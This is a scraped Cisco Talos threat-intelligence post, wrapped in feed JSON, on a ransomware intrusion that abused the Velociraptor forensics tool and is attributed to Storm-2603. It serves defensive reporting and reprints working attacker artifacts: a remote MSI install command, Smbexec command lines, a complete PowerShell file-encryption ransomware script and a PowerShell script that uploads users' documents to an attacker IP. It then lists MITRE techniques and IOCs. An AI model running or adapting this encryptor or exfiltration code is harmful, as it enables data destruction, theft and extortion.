{“lastseen”:”2025-10-09T12:09:10″,”description”:”* Cisco Talos has confirmed that ransomware operators are leveraging _Velociraptor_, an open-source digital forensics and incident response (DFIR) tool that had not previously been definitively tied to _ransomware incidents_.\\n * We assess with moderate confidence that this activity can be attributed to threat actor Storm-2603, based on _overlapping tools and tactics, techniques, and procedures (TTPs)_\\n * Talos also observed evidence of Babuk ransomware files on the victim’s network, which has not been previously deployed by Storm-2603.\\n\\n\\n\\nIn August 2025, Talos responded to a ransomware attack by actors who appeared to be affiliated with Warlock ransomware, based on their ransom note and use of Warlock’s data leak site (DLS). They deployed Warlock, LockBit, and Babuk ransomware to encrypt VMware ESXi virtual machines (VMs) and Windows servers. This severely impacted the customer’s IT environment.\\n\\n Figure 1. Ransomware note.\\n\\n# Velociraptor\\n\\nVelociraptor is designed for security teams to use for endpoint monitoring by deploying client agents across Windows, Linux and Mac systems to continuously collect data and respond to security events.\\n\\nVelociraptor played a significant role in this campaign, ensuring the actors maintained stealthy persistent access while deploying LockBit and Babuk ransomware. After gaining initial access the actors installed an outdated version of Velociraptor (version 0.73.4.0) that was exposed to a privilege escalation vulnerability (_CVE-2025-6264_) that could lead to arbitrary command execution and endpoint takeover.\\n\\nThreat actors have also _reportedly leveraged Velociraptor_ to download and execute Visual Studio Code with the likely intention of creating a tunnel to an attacker-controlled command-and-control (C2) server.\\n\\nThe addition of this tool in the ransomware playbook is in line with findings from Talos’ _2024 Year in Review_, which highlights that threat actors are utilizing an increasing variety of commercial and open-source products.\\n\\n# Attribution to Storm-2603 and ToolShell nexus\\n\\nTalos assesses with moderate confidence that this activity can be attributed to the group Storm-2603, based on overlapping tools and TTPs. Storm-2603 is a suspected China-based threat actor first identified in July 2025, when they began exploiting the on-premises SharePoint vulnerabilities known as ToolShell.\\n\\nSimilar to the activity Talos observed in this engagement, Storm-2603 is _known for deploying Warlock ransomware and Lockbit ransomware_ in the same engagement. While LockBit is widely deployed by a variety ransomware actors, Warlock was first advertised in June 2025 and has since been _heavily used by Storm-2603._ Additionally, it is highly unusual for actors to use two different ransomware variants in the same attack, increasing our confidence that this activity could be related to Storm-2603.\\n\\nThe threat actor in this engagement also mirrored several Storm-2603 TTPs, based on _reporting by Microsoft_:\\n\\n * Use of cmd.exe and batch scripts\\n * Disabling Microsoft Defender protections\\n * Creating scheduled tasks\\n * Manipulating Internet Information Services (IIS) components to load suspicious .NET assemblies\\n * Modifying Group Policy Objects (GPOs)\\n\\n\\n\\nWhile Talos was unable to observe how the actor obtained initial access due to limited access to the victim organization’s data, both their exposure to the _ToolShell_ vulnerabilities and our attribution to Storm-2603 increase the likelihood that initial access was gained through ToolShell exploitation.\\n\\n# Campaign overview\\n\\nThe first high-confidence indications of suspicious activity associated with this campaign occurred in mid-August 2025, with attempts to escalate privileges and move laterally within the compromised environment. We observed the threat actor creating admin accounts that synced to Entra ID (formerly Azure Active Directory) via the domain controller. The same actor-controlled admin account also accessed the VMware vSphere console, an interface used to manage and interact with virtual machines (VMs), which could allow for persistent access to the virtual environment.\\n\\nNotably, the threat actor installed an older version of Velociraptor on multiple servers to maintain persistence using the following command. We observed Velociraptor launching several times even after the host was isolated.\\n \\n \\n msiexec\u202f \/q \/i hxxps[:]\/\/stoaccinfoniqaveeambkp.blob.core.windows[.]net\/veeam\/v2.msi\u202f\\n\\nThe actors also executed the following command to run Smbexec, a Python script that comes with Impacket and allows an attacker to launch programs remotely using the SMB protocol:\\n \\n \\n %COMSPEC% \/Q \/c echo cd ^\\u003e \\\\\\\\%COMPUTERNAME%\\\\C$\\\\__output 2^\\u003e^\\u00261 \\u003e %SYSTEMROOT%\\\\TkTvjYUp.bat \\u0026 %COMSPEC% \/Q \/c %SYSTEMROOT%\\\\TkTvjYUp.bat \\u0026 del %SYSTEMROOT%\\\\TkTvjYUp.bat\u00a0\u00a0\\n C:\\\\Windows\\\\System32\\\\cmd.exe cmd.exe \/Q \/c cmd \/c c:\\\\windows\\\\temp\\\\1.bat \/y 1\\u003e \\\\Windows\\\\Temp\\\\suLGnR 2\\u003e\\u00261\u00a0\\n\\nTo impair defenses and evade detection, the actors modified Active Directory (AD) GPOs and:\\n\\n * Enabled \\”turn off real-time protection,\\” which continuously monitors for potential threats such as viruses, malware and spyware\\n * Disabled \\”behavior monitoring,\\” which blocks suspicious activities by observing deviations from established patterns of normal behavior\\n * Disabled \\”monitor file and program activity on your computer,\\” which observes how software behaves to identify patterns associated with malicious activity\\n\\n\\n\\nThe actors deployed a fileless _Powershell script_ that had an encryption functionality, which we believe was the primary encryptor that deployed mass encryption on the Windows machines: \\n \\n \\n function GER($n) {-join (1..$n|%{\\”ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^\\u0026*()-=+[]{}|;:’,.\\u003c\\u003e?`~\\”[(Get-Random -Maximum 74)]})}function err($pl,$sf){$rsa=New-Object System.Security.Cryptography.RSACryptoServiceProvider;$rsa.FromXmlString($sf);$PB=[Text.Encoding]::UTF8.GetBytes($pl);$rsa.Encrypt($PB,$false)} function gg($path) {$ke = GER(32);$ig =GER(16);$sf = ‘tdIXltqjmTpXRB43p+k6X9+JqBZvsD7+X4GsM0AVh0QS6Oev5RVAaQqc6m2pEKN7AYARcpz9iNy5JOB\/T+OtWmqxd42bLH+iAUjc1kc1qk1Cg38t7obrGja8L7UMoJkb97ry0ngak9BlqaS7P+wzApOLVJoBNxaJ2rCoj7+Crh3p3Vm2\/7\/o4pMjgg4S838jw6aiRbag\/v4SR86oupqjBvKxsAcZo5A4NDFoZ29j\/IMa6GNpMkVjsNPjvB\/GIqGcbTqJkb8HGSXw3KvHqwqfsB+01VTsbO7B8kIkOr4jB\/M+bHFwgYkUG4rS2s\/yJcOOkzH0tJwEj11tLv2bHSzoQQ==AQAB’; $eec=err -pl $ke+$ig -sf $sf;$eee=[System.Convert]::ToBase64String($eec);$key=[System.Text.Encoding]::UTF8.GetBytes($ke);$iv=[System.Text.Encoding]::UTF8.GetBytes($ig);try{$files=gci $path -Recurse -Include .pdf,.txt, *.doc, *.docx, *.odt, *.rtf, *.md, *.csv, *.tsv, *.jpg, *.jpeg, *.tiff, *.mp3, *.xls, *.xlsx, *.ods, *.ppt, *.pptx, *.odp, *.py, *.java, *.cpp, *.c, *.html, *.css, *.js, *.php, *.swift, *.kotlin, *.go, *.rb, *.sh, *.sql, *.db, *.sqlite, *.sqlite3, *.mdb, *.sql, *.zip, *.rar, *.7z, *.tar, *.gz, *.bz2, *.iso, *.torrent, *.ini, *.json, *.xml, *.log, *.bak, *.cfg, *.psd, *.vmdk | select -Expand FullName; foreach ($file in $files) { try {EFI $file $key $iv $eee} catch{}}} catch {Write-Host $ }} function EFI($ifi,$key,$iv,$aT) {if($ifi.EndsWith(\\”.xlockxlock\\”, [System.StringComparison]::OrdinalIgnoreCase)) {return};$aes = [System.Security.Cryptography.Aes]::Create();$aes.KeySize = 256;$aes.Key=$key;$aes.IV=$iv;try{$yy=New-Object System.IO.FileStream($ifi, [System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::None); $xx=$aes.CreateEncryptor($aes.Key, $aes.IV); $mm = New-Object System.Security.Cryptography.CryptoStream($yy, $xx, [System.Security.Cryptography.CryptoStreamMode]::Write); $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $jj = New-Object byte[] ($yy.Length); $yy.Read($jj, 0, $jj.Length) | Out-Null; $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $mm.Write($jj, 0, $jj.Length); $mm.FlushFinalBlock(); $se = 1 } catch { Write-Error $_ } finally {if ($mm) { $mm.Dispose() } if ($yy) { $yy.Dispose() } }try {$kk = [System.Text.Encoding]::UTF8.GetBytes($aT);$bb = New-Object System.IO.FileStream($ifi,[System.IO.FileMode]::Append,[System.IO.FileAccess]::Write,[System.IO.FileShare]::None);if ($se){$bb.Write($kk, 0, $kk.Length)}} catch {Write-Error $_} finally {if ($bb) { $bb.Dispose();if ($se){ren $ifi -NewName $ifi\\”.xlockxlock\\”;}}}};$vg =gdr -PS FileSystem | select -Expand Root;foreach ($II in $vg) {gg -path \\”$II\\”}\u00a0\\n\\nAfter the script was deployed, Talos observed ransomware executables on Windows machines that were identified by EDR solutions as LockBit, and encrypted files with the Warlock extension \\”xlockxlock\\”. There was also a Linux binary on ESXi servers flagged as the Babuk encryptor, which achieved only partial encryption and appended files with \\”.babyk\\”. Storm-2603 has not previously leveraged Babuk ransomware, based on public reporting.\\n\\nThe actors also conducted double extortion, exfiltrating data using the below PowerShell script. To evade detection, the exfiltration script shows that \\”$ProgressPreference\\” is set to \\”SilentlyContinue\\”, which suppresses any visual indication of the command’s progress. It also includes the \\”start-sleep\\” cmdlet, which suspends the script for a specified period of time. This cmdlet can be used to inhibit analysis, as many malware analysis tools, such as sandboxes, have a limited time window, and used to avoid triggering security alerts that might identify rapid, continuous script activity.\\n \\n \\n function GR {$numbers = 1..20;$numbers | Get-Random }\u00a0\u00a0\\n function Upfile {\u00a0\\n \u00a0\u00a0\u00a0 param (\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [string]$path = \\”C:\\\\Users\\\\\\”,\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [int]$maxConcurrentJobs = 40\u00a0 #\u00a0\\n \u00a0\u00a0\u00a0 )\u00a0\\n \u00a0\u00a0\u00a0 Add-Type -AssemblyName System.Web\u00a0\\n \u00a0\u00a0\u00a0 try {\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $files = Get-ChildItem -Path $path -Recurse -Include *.doc,*.docx,*.xlsx,*.ppt,*.pptx,*.xls -ErrorAction SilentlyContinue |\u00a0\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Where-Object { $_.Length -lt 50MB } |\u00a0\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Select-Object -ExpandProperty FullName\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $uploadScriptBlock = {\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 param ($file, $grValue)\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 try {\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Add-Type -AssemblyName System.Web\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $fileName = Split-Path -Path $file -Leaf\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $encodedFileName = [System.Web.HttpUtility]::UrlEncode($fileName)\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $uploadUrl = \\”http[:]\/\/65.38.121[.]226\/test\/$encodedFileName\\”\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Write-Host \\”upload $file to $uploadUrl\\”\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $ProgressPreference = ‘SilentlyContinue’\u00a0\\n $maxRetries = 3;$retryCount = 0\u00a0\\n while ($retryCount -lt $maxRetries) {\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 try {\u00a0\\n $wc = New-Object System.Net.WebClient;$wc.UploadFile($uploadUrl, \\”PUT\\”, $file) | Out-Null\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Write-Host \\”upload Sucess $fileName\\”\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 break\u00a0\\n }\u00a0\u00a0\\n catch {\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $retryCount++\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Write-Host \\”upload $fileName retry $retryCount error: $_\\”\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Start-Sleep -Seconds 2\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\u00a0\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 finally {$wc.Dispose()}}}\u00a0\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 catch\u00a0\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 {\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Write-Host \\”upload $fileName error: $_\\”\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 finally {$wc.Dispose()}\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $grValue = GR\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $jobs = @()\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 foreach ($file in $files) {\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 while ((Get-Job -State Running).Count -ge $maxConcurrentJobs) {Start-Sleep -Milliseconds 100}\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $jobs += Start-Job -ScriptBlock $uploadScriptBlock -ArgumentList $file, $grValue\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $jobs | Wait-Job | ForEach-Object {\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Receive-Job -Job $_ -Keep\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Remove-Job -Job $_\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\u00a0\\n \u00a0\u00a0\u00a0 } catch {\u00a0\\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Write-Host \\”getfile error: $_\\”\u00a0\\n \u00a0\u00a0\u00a0 }\u00a0\\n }\u00a0\\n $drives = @(\\”C:\\\\Users\\\\\\”, \\”D:\\\\\\”, \\”E:\\\\\\”, \\”F:\\\\\\”, \\”K:\\\\\\”)\u00a0\\n foreach ($drive in $drives) {\u00a0\\n \u00a0\u00a0\u00a0 if (Test-Path $drive) {Upfile -Path $drive\u00a0\u00a0 }\u00a0\\n \u00a0\u00a0\u00a0 else {Write-Host \\”Drive $drive is not accessible.\\” -ForegroundColor Yellow}\u00a0\\n }\u00a0\\n\\n# Mitigation recommendations\\n\\nPlease see Talos’ _Ransomware Primer_ for detailed recommendations on how to safeguard against ransomware threats. We also recommend referring to Talos’ _blog_ on ToolShell for information on these vulnerabilities and how to patch them. Additionally, Rapid7 has published some recommendations on detecting velociraptor misuse.\\n\\n# MITRE ATT\\u0026CK techniques\\n\\nResource Development \\n\\n * T1584.003 Compromise Infrastructure: Virtual Private Server\\n\\n\\n\\nExecution\\n\\n * T1059.001 PowerShell\\n\\n\\n\\nPersistence \\n\\n * T1136 Create Account\\n * T1505.006 Server Software Component: vSphere Installation Bundles\\n\\n\\n\\nPrivilege Escalation \\n\\n * T1098.007 Account Manipulation: Additional Local or Domain Groups\\n * T1098 Account Manipulation\\n\\n\\n\\nDefense Evasion \\n\\n * T1556 Modify Authentication Process\\n * T1484.001 Domain or Tenant Policy Modification: Group Policy Modification\\n\\n\\n\\nLateral Movement \\n\\n * T1021.001 Remote Services: Remote Desktop Protocol\\n\\n\\n\\nCollection \\n\\n * T1213 Data from Information Repositories\\n\\n\\n\\nExfiltration\\n\\n * T1041 Exfiltration Over C2 Channel\\n\\n\\n\\nImpact\\n\\n * T1486 Data Encrypted for Impact\\n * T1657 Financial Theft\\n\\n\\n\\n# Coverage\\n\\n\\n\\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.\\n\\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.\\n\\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\\n\\nCisco Secure Network\/Cloud Analytics (Stealthwatch\/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.\\n\\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.\\n\\nCisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.\\n\\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.\\n\\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.\\n\\nAdditional protections with context to your specific environment and threat data are available from the Firewall Management Center.\\n\\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\\n\\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.\\n\\nThe following ClamAV cover this threat _:_ \\nWin.Ransomware.Warlock-10057029-0\\n\\n# IOCs\\n\\nIOCs for this research can also be found at our GitHub repository here.\\n\\n_C2\/exfiltration IP address:_ \\n65.38.[121][.]226\\n\\n _Domain hosting malicious MSI:_ \\nstoaccinfoniqaveeambkp.blob.core.windows[.]net\\n\\n _Velociraptor C2 server_ : \\nvelo.qaubctgg.workers[.]dev\\n\\n _Velociraptor:Legitimate tool used by the adversary for persistence_ \\nVelociraptor installer – 649BDAA38E60EDE6D140BD54CA5412F1091186A803D3905465219053393F6421 \\nVelociraptor.exe – 12F177290A299BAE8A363F47775FB99F305BBDD56BBDFDDB39595B43112F9FB7 \\nMalicious Velociraptor config.yaml – A29125333AD72138D299CC9EF09718DDB417C3485F6B8FE05BA88A08BB0E5023 \\n\\n _Internal Monologue NTLM downgrade malware:_ \\nIn.exe- C74897B1E986E2876873ABB3B5069BF1B103667F7F0E6B4581FBDA3FD647A74A”,”published”:”2025-10-09T10:00:18″,”modified”:”2025-10-09T10:00:18″,”type”:”talosblog”,”title”:”Velociraptor leveraged in ransomware attacks”,”source”:””,”references”:””,”id”:”TALOSBLOG:FC34D3B85009C3A92DAB211EB18F9849″,”bulletinFamily”:”blog”,”cwe”:null,”cvelist”:[“CVE-2025-6264″],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:5.5,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:H\/PR:H\/UI:N\/S:C\/C:L\/I:L\/A:L”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/blog.talosintelligence.com\/velociraptor-leveraged-in-ransomware-attacks\/”,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-10-09T12:09:10″,”description”:”* Cisco Talos has confirmed that ransomware operators are leveraging _Velociraptor_, an open-source digital forensics and incident response (DFIR) tool that had not previously been…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,70,12,21,13,7,69,11,5],"class_list":["post-20794","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-cvss-55","tag-exploit","tag-medium","tag-news","tag-security","tag-talosblog","tag-tapic","tag-vulnerability"],"yoast_head":"\n